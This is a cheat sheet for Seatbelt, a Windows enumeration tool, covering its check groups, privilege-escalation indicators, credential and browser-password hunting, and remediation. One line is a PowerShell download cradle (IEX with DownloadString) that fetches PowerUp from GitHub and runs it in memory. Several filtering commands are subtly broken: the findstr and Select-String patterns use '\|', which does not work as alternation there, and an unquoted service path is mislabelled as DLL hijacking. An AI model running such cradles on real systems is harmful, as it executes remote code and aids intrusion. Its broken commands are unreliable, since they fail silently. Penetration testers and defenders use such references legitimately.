Ir al contenido
1337skills 1337skills - Hojas de Trucos

Seatbelt

Seatbelt is a C# Windows enumeration tool providing detailed system security assessments, vulnerability discovery, and privilege escalation path identification.

Installation

# Download compiled binary
https://github.com/GhostPack/Seatbelt/releases

# Compile from source (requires Visual Studio)
git clone https://github.com/GhostPack/Seatbelt.git
cd Seatbelt
# Open Seatbelt.sln in Visual Studio and build

Basic Usage

CommandDescription
Seatbelt.exe -hDisplay help and groups
Seatbelt.exe -group=allRun all checks
Seatbelt.exe -group=systemSystem information
Seatbelt.exe -group=userUser and group info
Seatbelt.exe -group=networkNetwork enumeration
Seatbelt.exe -group=dotnet.NET information
Seatbelt.exe -group=miscMiscellaneous checks

Enumeration Groups

System Group

Seatbelt.exe -group=system
  • OS version and build
  • System boot time
  • Hotfixes and patches
  • Running processes (elevation context)
  • Processor and memory info

User Group

Seatbelt.exe -group=user
  • Current user and privileges
  • User groups and memberships
  • Clipboard content
  • Desktop files and shortcuts
  • User environment variables
  • Scheduled tasks by user

Network Group

Seatbelt.exe -group=network
  • Network adapters and configuration
  • ARP table
  • Routing table
  • Active network connections
  • DNS configuration
  • Firewall rules

Process Group

Seatbelt.exe -group=process
  • All running processes
  • Process privileges
  • Process integrity level
  • DLL and module loads
  • Window titles (may contain sensitive data)

Services Group

Seatbelt.exe -group=services
  • All services and status
  • Service binary paths (unquoted path detection)
  • Service DACL permissions
  • Service startup type
  • Service logon users

Software Group

Seatbelt.exe -group=software
  • Installed applications
  • Software versions
  • Install paths
  • Known vulnerable software detection

Misc Group

Seatbelt.exe -group=misc
  • Event log information
  • Available credentials
  • WMI Event Subscriptions
  • Windows Defender status
  • Antivirus products
  • RDP sessions
  • Recycle bin contents
  • Browser history and credentials

Detailed Command Examples

Check UAC Configuration

Seatbelt.exe -group=system | findstr /i "UAC"

Find Unquoted Service Paths

Seatbelt.exe -group=services | findstr /i "unquoted"

List Privilege-Escalation Vectors

Seatbelt.exe -group=all | findstr /i "privesc\|unquoted\|admin\|system"

Check for Vulnerable Software

Seatbelt.exe -group=software
# Cross-reference versions with known CVEs

Network Reconnaissance

Seatbelt.exe -group=network
# Identify exposed services and listening ports

Check Credentials

Seatbelt.exe -group=misc | findstr /i "credential\|password"

Key Privilege Escalation Indicators

Critical Findings

  1. Unquoted Service Paths
Service: VulnerableService
Binary: C:\Program Files\Vulnerable Program\service.exe
Problem: Exploitable via DLL hijacking at C:\Program.exe
  1. Weak Service Permissions
Service DACL allows Everyone/Authenticated Users to:
- Stop/Start service
- Change service binary path
- Change service logon user
  1. UAC Bypass Opportunities
  • UAC level set to “Never notify”
  • AutoElevation enabled on vulnerable apps
  • COM object elevation opportunities
  1. Kernel Vulnerabilities
  • Missing patches enabling local privilege escalation
  • Vulnerable drivers installed
  1. Token Impersonation
  • SeImpersonatePrivilege enabled
  • Potato attacks available (Rotten/Golden/Sweet Potato)

Important Findings

  • Services running with weak permissions
  • Interesting scheduled tasks
  • Browser saved credentials
  • Configuration files with passwords
  • Writable system directories
  • Weak registry permissions

Output Parsing Tips

# Save output to file for analysis
Seatbelt.exe -group=all > seatbelt_output.txt

# Search for specific keywords
findstr /i "admin\|system\|privesc\|unquoted" seatbelt_output.txt

# Count findings
findstr /r "^\*" seatbelt_output.txt | find /c "*"

Combining with Other Tools

# Run Seatbelt then PowerUp for redundancy
Seatbelt.exe -group=all
powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks"

# Use with winPEAS for comprehensive enumeration
winPEASx64.exe all

Remediation Actions

Based on Seatbelt findings:

  1. Unquoted Service Paths - Add quotes to service binary paths
  2. Service Permissions - Restrict service DACLs to minimal required users
  3. Scheduled Tasks - Audit and remove unnecessary tasks
  4. UAC - Set to appropriate security level
  5. Hotfixes - Apply all security patches and updates
  6. Credentials - Audit and remove stored credentials
  7. Antivirus - Ensure Windows Defender or equivalent is enabled

Advanced Scenarios

Detecting Privilege Escalation Vectors

# Services running as SYSTEM with weak permissions
Seatbelt.exe -group=services | Select-String "SYSTEM" | Select-String "Everyone\|Authenticated Users"

# Unquoted paths in user-writable directories
Seatbelt.exe -group=services | Select-String "unquoted" | Select-String "Program Files\|Temp"

Identifying Lateral Movement Opportunities

Seatbelt.exe -group=network
# Find accessible network shares, RDP sessions, etc.

Persistence Mechanisms

Seatbelt.exe -group=user
# Review scheduled tasks and Run registry entries
  • winPEAS: General Windows privilege escalation enumeration
  • PowerUp: PowerShell-based privilege escalation checks
  • SharpUp: C# port of PowerUp
  • PrivEsc: Another C# enumeration tool
  • GodPotato/JuicyPotato: Token impersonation exploits

Last updated: March 2025 | GitHub